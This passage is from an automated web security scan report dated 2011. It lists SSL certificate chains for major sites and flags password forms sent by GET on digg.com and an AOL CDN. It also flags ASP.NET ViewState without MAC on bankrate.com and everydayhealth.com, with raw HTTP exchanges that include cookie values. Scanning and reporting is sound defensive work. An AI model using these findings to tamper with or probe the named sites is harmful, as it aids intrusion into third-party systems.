Issued by:  Entrust.net Secure Server Certification Authority
Valid from:  Sun Oct 01 00:00:00 CDT 2006
Valid to:  Sat Jul 26 13:15:15 CDT 2014

Certificate chain #3

Issued to:  Entrust.net Secure Server Certification Authority
Issued by:  Entrust.net Secure Server Certification Authority
Valid from:  Tue May 25 11:09:40 CDT 1999
Valid to:  Sat May 25 11:39:40 CDT 2019

12.2. https://www.facebook.com/

Summary

Severity:   Medium
Confidence:   Certain
Host:   https://www.facebook.com
Path:   /

Issue detail

The following problem was identified with the server's SSL certificate:

The server presented the following certificates:

Server certificate

Issued to:  www.facebook.com
Issued by:  DigiCert High Assurance CA-3
Valid from:  Sun Nov 14 18:00:00 CST 2010
Valid to:  Mon Dec 02 17:59:59 CST 2013

Certificate chain #1

Issued to:  DigiCert High Assurance CA-3
Issued by:  DigiCert High Assurance EV Root CA
Valid from:  Mon Apr 02 19:00:00 CDT 2007
Valid to:  Sat Apr 02 19:00:00 CDT 2022

Certificate chain #2

Issued to:  DigiCert High Assurance EV Root CA
Issued by:  Entrust.net Secure Server Certification Authority
Valid from:  Sun Oct 01 00:00:00 CDT 2006
Valid to:  Sat Jul 26 13:15:15 CDT 2014

Certificate chain #3

Issued to:  Entrust.net Secure Server Certification Authority
Issued by:  Entrust.net Secure Server Certification Authority
Valid from:  Tue May 25 11:09:40 CDT 1999
Valid to:  Sat May 25 11:39:40 CDT 2019

12.3. https://account.login.aol.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.login.aol.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  account.login.aol.com
Issued by:  AOL Member CA
Valid from:  Wed Jul 28 10:09:21 CDT 2010
Valid to:  Fri Jul 27 10:09:21 CDT 2012

Certificate chain #1

Issued to:  AOL Member CA
Issued by:  America Online Root Certification Authority 1
Valid from:  Fri Jun 04 12:26:39 CDT 2004
Valid to:  Mon Jun 04 12:26:39 CDT 2029

Certificate chain #2

Issued to:  America Online Root Certification Authority 1
Issued by:  America Online Root Certification Authority 1
Valid from:  Tue May 28 01:00:00 CDT 2002
Valid to:  Thu Nov 19 14:43:00 CST 2037

12.4. https://adwords.google.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://adwords.google.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  adwords.google.com
Issued by:  Google Internet Authority
Valid from:  Wed Apr 13 04:20:26 CDT 2011
Valid to:  Fri Apr 13 04:30:26 CDT 2012

Certificate chain #1

Issued to:  Google Internet Authority
Issued by:  Equifax Secure Certificate Authority
Valid from:  Mon Jun 08 15:43:27 CDT 2009
Valid to:  Fri Jun 07 14:43:27 CDT 2013

Certificate chain #2

Issued to:  Equifax Secure Certificate Authority
Issued by:  Equifax Secure Certificate Authority
Valid from:  Sat Aug 22 11:41:51 CDT 1998
Valid to:  Wed Aug 22 11:41:51 CDT 2018

12.5. https://aolproductcentral.aol.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://aolproductcentral.aol.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  aolproductcentral.aol.com
Issued by:  AOL Member CA
Valid from:  Wed Mar 02 10:30:26 CST 2011
Valid to:  Fri Mar 01 10:30:26 CST 2013

Certificate chain #1

Issued to:  AOL Member CA
Issued by:  America Online Root Certification Authority 1
Valid from:  Fri Jun 04 12:26:39 CDT 2004
Valid to:  Mon Jun 04 12:26:39 CDT 2029

Certificate chain #2

Issued to:  America Online Root Certification Authority 1
Issued by:  America Online Root Certification Authority 1
Valid from:  Tue May 28 01:00:00 CDT 2002
Valid to:  Thu Nov 19 14:43:00 CST 2037

12.6. https://api.screenname.aol.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://api.screenname.aol.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  api.screenname.aol.com
Issued by:  www.verisign.com/CPS Incorp.by Ref. LIABILITY LTD.(c)97 VeriSign
Valid from:  Mon Aug 30 19:00:00 CDT 2010
Valid to:  Wed Sep 12 18:59:59 CDT 2012

Certificate chain #1

Issued to:  www.verisign.com/CPS Incorp.by Ref. LIABILITY LTD.(c)97 VeriSign
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Wed Apr 16 19:00:00 CDT 1997
Valid to:  Mon Oct 24 18:59:59 CDT 2011

Certificate chain #2

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 CST 1996
Valid to:  Wed Aug 02 18:59:59 CDT 2028

12.7. https://at.atwola.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://at.atwola.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  at.atwola.com
Issued by:  AOL Member CA
Valid from:  Tue Sep 07 10:36:15 CDT 2010
Valid to:  Thu Sep 06 10:36:15 CDT 2012

Certificate chain #1

Issued to:  AOL Member CA
Issued by:  America Online Root Certification Authority 1
Valid from:  Fri Jun 04 12:26:39 CDT 2004
Valid to:  Mon Jun 04 12:26:39 CDT 2029

Certificate chain #2

Issued to:  America Online Root Certification Authority 1
Issued by:  America Online Root Certification Authority 1
Valid from:  Tue May 28 01:00:00 CDT 2002
Valid to:  Thu Nov 19 14:43:00 CST 2037

12.8. https://bill.aol.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://bill.aol.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  bill.aol.com
Issued by:  AOL Member CA
Valid from:  Wed May 12 07:43:14 CDT 2010
Valid to:  Fri May 11 07:43:14 CDT 2012

Certificate chain #1

Issued to:  AOL Member CA
Issued by:  America Online Root Certification Authority 1
Valid from:  Fri Jun 04 12:26:39 CDT 2004
Valid to:  Mon Jun 04 12:26:39 CDT 2029

Certificate chain #2

Issued to:  America Online Root Certification Authority 1
Issued by:  America Online Root Certification Authority 1
Valid from:  Tue May 28 01:00:00 CDT 2002
Valid to:  Thu Nov 19 14:43:00 CST 2037

12.9. https://chrome.google.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://chrome.google.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  *.google.com
Issued by:  Google Internet Authority
Valid from:  Wed Apr 13 04:16:45 CDT 2011
Valid to:  Fri Apr 13 04:26:45 CDT 2012

Certificate chain #1

Issued to:  Google Internet Authority
Issued by:  Equifax Secure Certificate Authority
Valid from:  Mon Jun 08 15:43:27 CDT 2009
Valid to:  Fri Jun 07 14:43:27 CDT 2013

Certificate chain #2

Issued to:  Equifax Secure Certificate Authority
Issued by:  Equifax Secure Certificate Authority
Valid from:  Sat Aug 22 11:41:51 CDT 1998
Valid to:  Wed Aug 22 11:41:51 CDT 2018

12.10. https://maps-api-ssl.google.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://maps-api-ssl.google.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  *.google.com
Issued by:  Google Internet Authority
Valid from:  Wed Apr 13 04:16:45 CDT 2011
Valid to:  Fri Apr 13 04:26:45 CDT 2012

Certificate chain #1

Issued to:  Google Internet Authority
Issued by:  Equifax Secure Certificate Authority
Valid from:  Mon Jun 08 15:43:27 CDT 2009
Valid to:  Fri Jun 07 14:43:27 CDT 2013

Certificate chain #2

Issued to:  Equifax Secure Certificate Authority
Issued by:  Equifax Secure Certificate Authority
Valid from:  Sat Aug 22 11:41:51 CDT 1998
Valid to:  Wed Aug 22 11:41:51 CDT 2018

12.11. https://my.screenname.aol.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://my.screenname.aol.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  my.screenname.aol.com
Issued by:  www.verisign.com/CPS Incorp.by Ref. LIABILITY LTD.(c)97 VeriSign
Valid from:  Tue Feb 02 18:00:00 CST 2010
Valid to:  Mon Mar 05 17:59:59 CST 2012

Certificate chain #1

Issued to:  www.verisign.com/CPS Incorp.by Ref. LIABILITY LTD.(c)97 VeriSign
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Wed Apr 16 19:00:00 CDT 1997
Valid to:  Mon Oct 24 18:59:59 CDT 2016

Certificate chain #2

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 CST 1996
Valid to:  Wed Aug 02 18:59:59 CDT 2028

12.12. https://new.aol.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://new.aol.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  new.aol.com
Issued by:  AOL Member CA
Valid from:  Wed Dec 22 22:41:25 CST 2010
Valid to:  Fri Dec 21 22:41:25 CST 2012

Certificate chain #1

Issued to:  AOL Member CA
Issued by:  America Online Root Certification Authority 1
Valid from:  Fri Jun 04 12:26:39 CDT 2004
Valid to:  Mon Jun 04 12:26:39 CDT 2029

Certificate chain #2

Issued to:  America Online Root Certification Authority 1
Issued by:  America Online Root Certification Authority 1
Valid from:  Tue May 28 01:00:00 CDT 2002
Valid to:  Thu Nov 19 14:43:00 CST 2037

12.13. https://rsp.web.aol.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://rsp.web.aol.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  rsp.web.aol.com
Issued by:  AOL Member CA
Valid from:  Tue Jul 14 09:53:14 CDT 2009
Valid to:  Thu Jul 14 09:53:14 CDT 2011

Certificate chain #1

Issued to:  AOL Member CA
Issued by:  America Online Root Certification Authority 1
Valid from:  Fri Jun 04 12:26:39 CDT 2004
Valid to:  Mon Jun 04 12:26:39 CDT 2029

Certificate chain #2

Issued to:  America Online Root Certification Authority 1
Issued by:  America Online Root Certification Authority 1
Valid from:  Tue May 28 01:00:00 CDT 2002
Valid to:  Thu Nov 19 14:43:00 CST 2037

12.14. https://spreadsheets.google.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://spreadsheets.google.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  *.google.com
Issued by:  Google Internet Authority
Valid from:  Wed Apr 13 04:16:45 CDT 2011
Valid to:  Fri Apr 13 04:26:45 CDT 2012

Certificate chain #1

Issued to:  Google Internet Authority
Issued by:  Equifax Secure Certificate Authority
Valid from:  Mon Jun 08 15:43:27 CDT 2009
Valid to:  Fri Jun 07 14:43:27 CDT 2013

Certificate chain #2

Issued to:  Equifax Secure Certificate Authority
Issued by:  Equifax Secure Certificate Authority
Valid from:  Sat Aug 22 11:41:51 CDT 1998
Valid to:  Wed Aug 22 11:41:51 CDT 2018

12.15. https://twitter.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://twitter.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  twitter.com
Issued by:  VeriSign Class 3 Extended Validation SSL CA
Valid from:  Mon Jul 26 19:00:00 CDT 2010
Valid to:  Wed Jul 27 18:59:59 CDT 2011

Certificate chain #1

Issued to:  VeriSign Class 3 Extended Validation SSL CA
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Tue Nov 07 18:00:00 CST 2006
Valid to:  Mon Nov 07 17:59:59 CST 2016

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 CST 2006
Valid to:  Sun Nov 07 17:59:59 CST 2021

Certificate chain #3

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 CST 1996
Valid to:  Wed Aug 02 18:59:59 CDT 2028

12.16. https://us.etrade.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://us.etrade.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  us.etrade.com
Issued by:  VeriSign Class 3 Extended Validation SSL CA
Valid from:  Mon Jul 19 19:00:00 CDT 2010
Valid to:  Wed Jul 20 18:59:59 CDT 2011

Certificate chain #1

Issued to:  VeriSign Class 3 Extended Validation SSL CA
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Tue Nov 07 18:00:00 CST 2006
Valid to:  Mon Nov 07 17:59:59 CST 2016

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 CST 2006
Valid to:  Sun Nov 07 17:59:59 CST 2021

Certificate chain #3

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 CST 1996
Valid to:  Wed Aug 02 18:59:59 CDT 2028

12.17. https://www.fightmagazine.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.fightmagazine.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www.fightmagazine.com
Issued by:  Thawte SSL CA
Valid from:  Mon Apr 04 19:00:00 CDT 2011
Valid to:  Thu May 03 18:59:59 CDT 2012

Certificate chain #1

Issued to:  Thawte SSL CA
Issued by:  thawte Primary Root CA
Valid from:  Sun Feb 07 18:00:00 CST 2010
Valid to:  Fri Feb 07 17:59:59 CST 2020

Certificate chain #2

Issued to:  thawte Primary Root CA
Issued by:  Thawte Premium Server CA
Valid from:  Thu Nov 16 18:00:00 CST 2006
Valid to:  Wed Dec 30 17:59:59 CST 2020

Certificate chain #3

Issued to:  Thawte Premium Server CA
Issued by:  Thawte Premium Server CA
Valid from:  Wed Jul 31 19:00:00 CDT 1996
Valid to:  Fri Jan 01 17:59:59 CST 2021

12.18. https://www.godaddy.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.godaddy.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www.GoDaddy.com
Issued by:  Go Daddy Secure Certification Authority
Valid from:  Tue Jan 04 10:21:18 CST 2011
Valid to:  Mon Jan 14 16:28:36 CST 2013

Certificate chain #1

Issued to:  Go Daddy Secure Certification Authority
Issued by:  Go Daddy Class 2 Certification Authority
Valid from:  Wed Nov 15 19:54:37 CST 2006
Valid to:  Sun Nov 15 19:54:37 CST 2026

Certificate chain #2

Issued to:  Go Daddy Class 2 Certification Authority
Issued by:  Go Daddy Class 2 Certification Authority
Valid from:  Tue Jun 29 12:06:20 CDT 2004
Valid to:  Thu Jun 29 12:06:20 CDT 2034

12.19. https://www.neodata.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.neodata.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www.neodata.com
Issued by:  www.verisign.com/CPS Incorp.by Ref. LIABILITY LTD.(c)97 VeriSign
Valid from:  Mon Aug 17 19:00:00 CDT 2009
Valid to:  Sun Sep 04 18:59:59 CDT 2011

Certificate chain #1

Issued to:  www.verisign.com/CPS Incorp.by Ref. LIABILITY LTD.(c)97 VeriSign
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Wed Apr 16 19:00:00 CDT 1997
Valid to:  Mon Oct 24 18:59:59 CDT 2016

Certificate chain #2

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 CST 1996
Valid to:  Wed Aug 02 18:59:59 CDT 2028

13. Password field submitted using GET method
There are 2 instances of this issue:

Issue background

The application uses the GET method to submit passwords, which are transmitted within the query string of the requested URL. Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing passwords into the URL increases the risk that they will be captured by an attacker.

Issue remediation

All forms submitting passwords should use the POST method. To achieve this, you should specify the method attribute of the FORM tag as method="POST". It may also be necessary to modify the corresponding server-side form handler to ensure that submitted passwords are properly retrieved from the message body, rather than the URL.


13.1. http://digg.com/submit

Summary

Severity:   Low
Confidence:   Certain
Host:   http://digg.com
Path:   /submit

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:

The form contains the following password field:

Request

GET /submit HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:52:57 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=-781655937076164456%3A203; expires=Fri, 06-May-2011 10:52:57 GMT; path=/; domain=digg.com
Set-Cookie: d=74a0d936cee33a389ca1110cdc45b54249fb1ab6f82ad32b7390fde3b4b270f3; expires=Tue, 04-May-2021 21:00:37 GMT; path=/; domain=.digg.com
X-Digg-Time: D=25192 10.2.128.235
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 8171

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg
- Submit a link
</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics
...[SNIP]...
</script><form class="hidden">
<input type="text" name="ident" value="" id="ident-saved">
<input type="password" name="password" value="" id="password-saved">
</form>
...[SNIP]...

13.2. http://o.aolcdn.com/art/merge/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://o.aolcdn.com
Path:   /art/merge/

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:

The form contains the following password field:

Request

GET /art/merge/?f=/mobileportal/s2c_modal.js&f=/mobileportal/mobile_s2c_init.js&f=/feedback/feedback1.js&f=/mobileportal/mobileblog_profile.js&xpsec=31536000&ver=1y HTTP/1.1
Host: o.aolcdn.com
Proxy-Connection: keep-alive
Referer: http://mobile.aol.com/?icid=prodserv_mobile_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Mime-Version: 1.0
Server: AOLserver/4.0.10
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: max-age=86400
Expires: Fri, 06 May 2011 00:58:27 GMT
Date: Thu, 05 May 2011 00:58:27 GMT
Connection: close
Content-Length: 27714

eval(function ($) {
$.modal = function (data, options) {
return $.modal.impl.init(data, options);
};
$.modal.close = function () {
$.modal.impl.close(true);
};
$.fn
...[SNIP]...
</span><form name="login" onsubmit="profileLogin(); return false;"><label for="confirmpassword">
...[SNIP]...
</label><input type="password" name="confirmpassword" id="pwLogin" /><input id="loginButton" type="submit" onClick="profileLogin();" value="Login">
...[SNIP]...

14. ASP.NET ViewState without MAC enabled
There are 5 instances of this issue:

Issue description

The ViewState is a mechanism built in to the ASP.NET platform for persisting elements of the user interface and other data across successive requests. The data to be persisted is serialised by the server and transmitted via a hidden form field. When it is POSTed back to the server, the ViewState parameter is deserialised and the data is retrieved.

By default, the serialised value is signed by the server to prevent tampering by the user; however, this behaviour can be disabled by setting the Page.EnableViewStateMac property to false. If this is done, then an attacker can modify the contents of the ViewState and cause arbitrary data to be deserialised and processed by the server. If the ViewState contains any items that are critical to the server's processing of the request, then this may result in a security exposure.

You should review the contents of the deserialised ViewState to determine whether it contains any critical items that can be manipulated to attack the application.

Issue remediation

There is no good reason to disable the default ASP.NET behaviour in which the ViewState is signed to prevent tampering. To ensure that this occurs, you should set the Page.EnableViewStateMac property to true on any pages where the ViewState is not currently signed.


14.1. http://www.bankrate.com/funnel/mortgages/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bankrate.com
Path:   /funnel/mortgages/

Request

GET /funnel/mortgages/ HTTP/1.1
Host: www.bankrate.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Servername: a-brmweb02
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 1.7.0
Content-Type: text/html; charset=utf-8
Expires: Thu, 05 May 2011 10:56:19 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Thu, 05 May 2011 10:56:19 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 46622


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link type="text/css"
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="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" />
...[SNIP]...

14.2. http://www.everydayhealth.com/allergy/climate-change-and-allergies.aspx

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.everydayhealth.com
Path:   /allergy/climate-change-and-allergies.aspx

Request

GET /allergy/climate-change-and-allergies.aspx HTTP/1.1
Host: www.everydayhealth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 05 May 2011 10:56:31 GMT
Server: Microsoft-IIS/6.0
ServerID: : USNJWWEB11
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: .ASPXANONYMOUS=AcxBpO4hyeM5MDY2ODIwZC0xMWZhLTRjODktOGQzNS03NzFlZGNmNzhkODY1; expires=Wed, 13-Jul-2011 21:36:31 GMT; path=/
Set-Cookie: ASP.NET_SessionId=ahsac155xnki2v55pzjexlmb; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 49105


<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">

<head id="head"><title>
   Can Climate Change Cause Allergy? - Allergy Center - Every
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKMTMwOTUyNTA1MQ9kFgQCAQ9kFgICBA8WAh4EVGV4dAX7Bg0KPG1ldGEgcHJvcGVydHk9Im9nOnRpdGxlIiBjb250ZW50PSJDYW4gQ2xpbWF0ZSBDaGFuZ2UgQ2F1c2UgQWxsZXJneT8gLSBBbGxlcmd5IENlbnRlciAtIEV2ZXJ5ZGF5IEhlYWx0aCIvPg0KPG1ldGEgcHJvcGVydHk9Im9nOmRlc2NyaXB0aW9uIiAgcnVuYXQ9InNlcnZlciIgIGlkPSJmYmRlc2NyaXB0aW9uIiBjb250ZW50PSJHbG9iYWwgd2FybWluZyBjb3VsZCBiZSBhZ2dyYXZhdGluZyB5b3VyIGFsbGVyZ2llcy4gR2V0IGFkdmljZSBvbiBob3cgdG8gZWFzZSBzeW1wdG9tcyBhbmQgY2FyZSBmb3IgYWxsZXJnaWVzIGluIHRvZGF5J3MgZW52aXJvbm1lbnQgYXQgRXZlcnlkYXkgSGVhbHRoLiIgPg0KPG1ldGEgcHJvcGVydHk9Im9nOnR5cGUiIGNvbnRlbnQ9ImFydGljbGUiIC8+DQo8bWV0YSBwcm9wZXJ0eT0ib2c6aW1hZ2UiIGNvbnRlbnQ9Imh0dHA6Ly9pbWFnZXMuYWdvcmFtZWRpYS5jb20vZXZlcnlkYXloZWFsdGgvZ2Ntcy9sb2dvX2VoXzUweDUwLmdpZiIgLz4NCjxtZXRhIHByb3BlcnR5PSJvZzpzaXRlX25hbWUiIGNvbnRlbnQ9IkV2ZXJ5ZGF5SGVhbHRoLmNvbSIvPg0KPG1ldGEgcHJvcGVydHk9ImZiOmFwcF9pZCIgY29udGVudD0iMTM1MzQ2MDM2NDkwMTg2Ii8+DQo8bWV0YSBwcm9wZXJ0eT0iZmI6YWRtaW5zIiBjb250ZW50PSIiIC8+DQo8bWV0YSBwcm9wZXJ0eT0ib2c6dXJsIiBydW5hdD0ic2VydmVyIiBpZD0iZmJ1cmwiIGNvbnRlbnQ9Imh0dHA6Ly93d3cuZXZlcnlkYXloZWFsdGguY29tL2FsbGVyZ3kvY2xpbWF0ZS1jaGFuZ2UtYW5kLWFsbGVyZ2llcy5hc3B4IiAvPg0KDQo8c2NyaXB0IHR5cGU9InRleHQvamF2YXNjcmlwdCIgc3JjPSJodHRwOi8vY29ubmVjdC5mYWNlYm9vay5uZXQvZW5fVVMvYWxsLmpzI3hmYm1sPTEiPjwvc2NyaXB0PmQCAw9kFgICAQ9kFgICAg9kFghmD2QWBGYPDxYCHgdWaXNpYmxlaGRkAgEPZBYCAgEPZBYCZg8PFgQeCENzc0NsYXNzBQp2ZXJ0aWNhbGFkHgRfIVNCAgJkZAICD2QWAgIBD2QWBAIBDw8WAh8ABQ5OZXh0IEFydGljbGU6IGRkAgMPFgIeC18hSXRlbUNvdW50AgEWAmYPZBYCAgEPDxYCHgtOYXZpZ2F0ZVVybAVaaHR0cDovL3d3dy5ldmVyeWRheWhlYWx0aC5jb20vaGVhbHRoeS1saXZpbmcvMDIyNS9nbG9iYWwtd2FybWluZy1tYXktcG9zZS1kZWF0aC1yaXNrcy5hc3B4ZBYCZg8VASdHbG9iYWwgICBXYXJtaW5nICBNYXkgUG9zZSBIZWFsdGggUmlza3NkAgMPZBYGAgEPZBYEAgEPDxYCHwAFHVJlbGF0ZWQgQXJ0aWNsZXMgb24gQWxsZXJnaWVzZGQCAw8WAh8EAgMWBmYPZBYCAgEPDxYCHwUFWmh0dHA6Ly93d3cuZXZlcnlkYXloZWFsdGguY29tL2hlYWx0aHktbGl2aW5nLzAyMjUvZ2xvYmFsLXdhcm1pbmctbWF5LXBvc2UtZGVhdGgtcmlza3MuYXNweGQWAmYPFQEnR2xvYmFsICAgV2FybWluZyAgTWF5IFBvc2UgSGVh
bHRoIFJpc2tzZAIBD2QWAgIBDw8WAh8FBVlodHRwOi8vd3d3LmV2ZXJ5ZGF5aGVhbHRoLmNvbS9hbGxlcmdpZXMvc3BlY2lhbGlzdHMvaG93LWRvLWktdGVzdC1mb3ItZm9vZC1hbGxlcmdpZXMuYXNweGQWAmYPFQEjSG93IERvIEkgVGVzdCBGb3IgRm9vZCAgQWxsZXJnaWVzID9kAgIPZBYCAgEPDxYCHwUFQmh0dHA6Ly93d3cuZXZlcnlkYXloZWFsdGguY29tL2FsbGVyZ2llcy9hbGxlcmd5LWJsb29kLXRlc3RpbmcuYXNweGQWAmYPFQEcQmxvb2QgVGVzdGluZyBGb3IgIEFsbGVyZ2llc2QCAg9kFgQCAQ8PFgIfAAUbTW9yZSBvbiBBbGxlcmd5IE1lZGljYXRpb25zZGQCAw8WAh8EAgMWBmYPZBYCAgEPDxYCHwUFMWh0dHA6Ly93d3cuZXZlcnlkYXloZWFsdGguY29tL2RydWdzL2xpcXVpLWFsbGVyZ3lkFgJmDxUBDkxpcXVpLSBBbGxlcmd5ZAIBD2QWAgIBDw8WAh8FBTNodHRwOi8vd3d3LmV2ZXJ5ZGF5aGVhbHRoLmNvbS9kcnVncy9kYXlxdWlsLWFsbGVyZ3lkFgJmDxUBEERheXF1aWwgIEFsbGVyZ3lkAgIPZBYCAgEPDxYCHwUFNGh0dHA6Ly93d3cuZXZlcnlkYXloZWFsdGguY29tL2RydWdzL2JlbmFkcnlsLWFsbGVyZ3lkFgJmDxUBEUJlbmFkcnlsICBBbGxlcmd5ZAIDD2QWBAIBDw8WAh8ABRtBc2sgYSBQaGFybWFjaXN0OiBBbGxlcmdpZXNkZAIDDxYCHwQCAxYGZg9kFgICAQ8PFgIfBQV4aHR0cDovL3d3dy5ldmVyeWRheWhlYWx0aC5jb20vaGVhbHRoLXF1ZXN0aW9ucy9kaXVyZXRpY3Mvd2hpY2gtZGl1cmV0aWNzLWNhbi15b3UtdGFrZS1pZi15b3UtYXJlLWFsbGVyZ2ljLXRvLXN1bGZhLWRydWdzZBYCZg8VAUBXaGljaCBEaXVyZXRpY3MgQ2FuIFlvdSBUYWtlIElmIFlvdSBBcmUgQWxsZXJnaWMgVG8gU3VsZmEgRHJ1Z3M/ZAIBD2QWAgIBDw8WAh8FBWxodHRwOi8vd3d3LmV2ZXJ5ZGF5aGVhbHRoLmNvbS9oZWFsdGgtcXVlc3Rpb25zL2NhZmZlaW5lL3doYXQtYXJlLXNvbWUtb2YtdGhlLWFsbGVyZ2ljLXN5bXB0b21zLWZyb20tY2FmZmVpbmVkFgJmDxUBNVdoYXQgQXJlIFNvbWUgT2YgVGhlIEFsbGVyZ2ljIFN5bXB0b21zIEZyb20gQ2FmZmVpbmU/ZAICD2QWAgIBDw8WAh8FBW9odHRwOi8vd3d3LmV2ZXJ5ZGF5aGVhbHRoLmNvbS9oZWFsdGgtcXVlc3Rpb25zL2FzdGVwcm8vY2FuLWFzdGVwcm8td2VpZ2h0LWdhaW4tY2FuLXNpb